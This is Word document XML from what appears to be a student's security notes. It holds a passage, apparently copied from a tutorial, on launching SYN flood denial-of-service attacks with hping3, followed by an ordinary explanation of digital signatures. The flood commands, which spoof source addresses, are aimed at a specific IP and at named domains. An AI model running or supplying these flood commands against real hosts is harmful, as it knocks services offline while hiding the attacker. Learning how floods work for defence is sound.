      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Getting started with DDOS attacks using hping3:</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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>On Debian and based Linux distributions you can install hping3 by running:</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i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>apt install hping3 -y</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lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4964686" cy="2360428"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="61" name="Picture 61" descr="https://linuxhint.com/wp-content/uploads/2020/02/1-22.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inuxhint.com/wp-content/uploads/2020/02/1-22.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5394" cy="2375028"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>A simple DOS (not DDOS) attack would be:</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i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sudo hping3 -S --flood -V -p 80 170.155.9.185</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lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5812247" cy="1966817"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="Picture 60" descr="https://linuxhint.com/wp-content/uploads/2020/02/2-23.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inuxhint.com/wp-content/uploads/2020/02/2-23.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322" cy="1979024"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Where:</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sudo: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>gives needed privileges to run hping3.</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>hping3: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>calls hping3 program.</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-S: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>specifies SYN packets.</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>–flood: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>shoot at discretion, replies will be ignored (that’s why replies wont be shown) and packets will be sent fast as possible.</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>V:</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> Verbosity.</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-p 80: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>port 80, you can replace this number for the service you want to attack.</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170.155.9.185:</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> target IP.</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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Flood using SYN packets against port 80:</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szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>The following example portrays a SYN attack against lacampora.org:</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szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source</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szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Where:</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Lacampora.org: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>is the target</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-q: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>brief output</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-n:</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> show target IP instead of host.</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-d 120: </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>set packet size</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>–rand-source:</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> hide IP address.</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lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5684592" cy="2094732"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="59" name="Picture 59" descr="https://linuxhint.com/wp-content/uploads/2020/02/3-21.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inuxhint.com/wp-content/uploads/2020/02/3-21.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8916" cy="2103695"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>The following example shows another flood possible example:</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noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SYN flood against port 80:</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sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t># </w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>sudo hping3 --rand-source ivan.com -S -q -p 80 --flood</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E33B8" w:rsidRPr="004750F9" w:rsidRDefault="001E33B8" w:rsidP="001E33B8">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5323537" cy="1531177"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Picture 58" descr="https://linuxhint.com/wp-content/uploads/2020/02/4-22.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inuxhint.com/wp-content/uploads/2020/02/4-22.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8195" cy="1544022"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B2E36" w:rsidRPr="004750F9" w:rsidRDefault="001B2E36" w:rsidP="001E33B8">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8"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D065D" w:rsidRPr="004750F9" w:rsidRDefault="003D065D" w:rsidP="001E33B8">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8"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="003D065D">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8"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="00943135">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Digital Signatures</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 xml:space="preserve">A digital signature is a mathematical technique used to validate the authenticity and integrity of a message, software, or digital document. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="240934EB" wp14:editId="103FE2EE">
            <wp:extent cx="5730875" cy="244538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2445385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>How Digital Signature Works</w:t>
      </w:r>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</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Message digest is computed by applying hash function on the message and then message digest is encrypted using private key of sender to form the digital signature. (digital signature = encryption (private key of sender, message digest) and message digest = message digest algorithm(message)).</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Digital signature is then transmitted with the message.(message + digital signature is transmitted)</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Receiver decrypts the digital signature using the public key of sender.(This assures authenticity, as only sender has his private key so only sender can encrypt using his private key which can thus be decrypted by sender’s public key).</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The receiver now has the message digest.</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The receiver can compute the message digest from the message (actual message is sent with the digital signature).</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The message digest computed by receiver and the message digest (got by decryption on digital signature) need to be same for ensuring integrity.</w:t>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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Message digest is computed using one-way hash function, i.e. a hash function in which computation of hash value of a message is easy but computation of the message from hash value of the message is very difficult. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Practical Example Of  Digital Signature</w:t>
      </w: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 xml:space="preserve">Send Email With My Digital Signature </w:t>
      </w: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r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DF189D7" wp14:editId="364204F4">
            <wp:extent cx="4678045" cy="22860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8045" cy="2286000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="00943135" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00943135">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Received Email With Rajeev’s Digital Signature.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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r w:rsidRPr="004750F9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DC4C442" wp14:editId="20A9D39F">
            <wp:extent cx="5452197" cy="296648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3816" cy="2972806"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004750F9" w:rsidRPr="004750F9" w:rsidRDefault="004750F9" w:rsidP="004750F9">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
